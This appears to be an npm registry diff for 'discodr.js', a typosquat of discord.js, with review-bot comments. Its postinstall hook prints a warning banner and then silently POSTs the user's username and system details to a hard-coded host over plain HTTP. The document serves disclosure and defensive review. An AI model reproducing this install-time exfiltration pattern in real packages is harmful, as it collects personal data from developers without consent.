discodr.js 1.0.0
Potentially problematic release.
This version of discodr.js might be problematic. Click here for more details.
- package/package.json +12 -0
- package/postinstall.js +33 -0
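--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,12 @@
+{
+"name": "discodr.js",
+"version": "1.0.0",
+"description": "This package is intended to catch typos for discord.js safely. Please be careful.",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"postinstall": "node postinstall.js"
+},
+"author": "",
+"license": "ISC"
+}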
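Review bot: The `postinstall` entry on line 8 makes `postinstall.js` run automatically, with the installing user's privileges, as soon as the package is installed and before any code imports it. Nothing in the manifest's `description` mentions this hook or that it makes a network request, so that field should say so. Consumers who do not need lifecycle scripts can block this class of behaviour with `npm install --ignore-scripts` or `ignore-scripts=true` in `.npmrc`. The manifest also declares `"main": "index.js"`, but the file list for this release appears to contain only `package.json` and `postinstall.js`, so `require("discodr.js")` would presumably fail to resolve.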
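--- a/package/postinstall.js
+++ b/package/postinstall.js
@@ -0,0 +1,33 @@
+// since you're reading this: the point of this package is to actually test how common it is
+// for people to make this typo.
+// If I was an attacker, how much damage could I do right here?
+// Is it even possible to do anything about this? (yeah, but not without unseating 95% of the ecosystem)
+const http = require("http");
+const fs = require("fs");
+
+console.log("!!! YOU HAVE INSTALLED THE WRONG PACKAGE !!!");
+console.log("!!! You have installed a typo'd package for discord.js !!!");
+console.log("!!! UPON INSTALLING A PACKAGE THE PACKAGE MAY EXECUTE ANYTHING THEY WANT (I'm writing this to you from your shell!) !!!");
+console.log("!!! Please, be more careful. And maybe NPM should do something about this. !!!");
+console.log("!!! If I was an attacker, I could type anything I wanted right now into your shell. !!!");
+console.log("!!! Please uninstall this package. !!!");
+
+let pkgname;
+
+try {
+pkgname = JSON.parse(fs.readFileSync("./package.json")).name
+} catch { }
+
+const thingToLog = /* process.env is a bit too unethical for an experiment. Might actually have secrets. */
+{ arch: process.arch, version: process.version, user: process.env.USER, pkgname }
+
+const req = http.request("http://zkldi.xyz:1235/discordjs-test", { method: "POST", headers: { "Content-Type": "application/json" } }, (res) => {
+process.exit(1);
+});
+
+req.write(JSON.stringify(thingToLog));
+req.end();
+
+setTimeout(() => {
+process.exit(2)
+}, 10_000);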
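Review bot: The request on new lines 24–29 sends the local username (`process.env.USER`) with the architecture, Node version and a package name to a hard-coded host over plain HTTP during `npm install`, without consent and readable on the network path. The comment on line 21 acknowledges the ethics concern, but the username is still personal data. The warning banner on lines 8–13 already serves the stated purpose, so the collection could be dropped and the script could end with `process.exit(1);` after the last `console.log`. As written, the request also has no `error` listener, so a DNS or connection failure would surface as an uncaught exception rather than one of the two intended exit codes. Responders who find this package in a lockfile can look for outbound traffic to `zkldi.xyz:1235` in install-time egress logs.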